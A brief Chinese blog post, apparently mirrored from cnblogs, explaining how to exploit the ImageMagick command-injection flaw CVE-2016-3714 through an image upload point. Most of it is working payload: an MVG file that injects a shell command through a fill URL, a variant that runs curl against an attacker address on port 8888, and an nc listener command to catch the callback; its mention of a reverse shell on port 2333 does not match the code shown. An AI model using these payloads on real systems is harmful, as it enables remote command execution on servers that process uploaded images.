zoukankan      html  css  js  c++  java
  • CVE-2016-3714-ImageMagick 漏洞利用

    漏洞简介:/etc/ImageMagick/delegates.xml 将%s,%l加入到command里造成了命令执行

    利用方式:

    poc代码:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://"| command")'
    pop graphic-context
    

      

    图片上传点,抓包,附上exp代码:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://"| curl 172.16.20.108:8888")'
    pop graphic-context

    ip:你要反弹的shell地址,2333端口号,服务器监听反弹shell。

    nc -lvp 8888
    

  • 相关阅读:
    OpenCV && C++ 01
    图像矩的理解
    Halcon Example
    LabVIEW
    Working Experience
    Working Experience
    Working Experience
    C++
    Trigger,Cursor
    Paging
  • 原文地址:https://www.cnblogs.com/junsec/p/11166015.html
Copyright © 2011-2022 走看看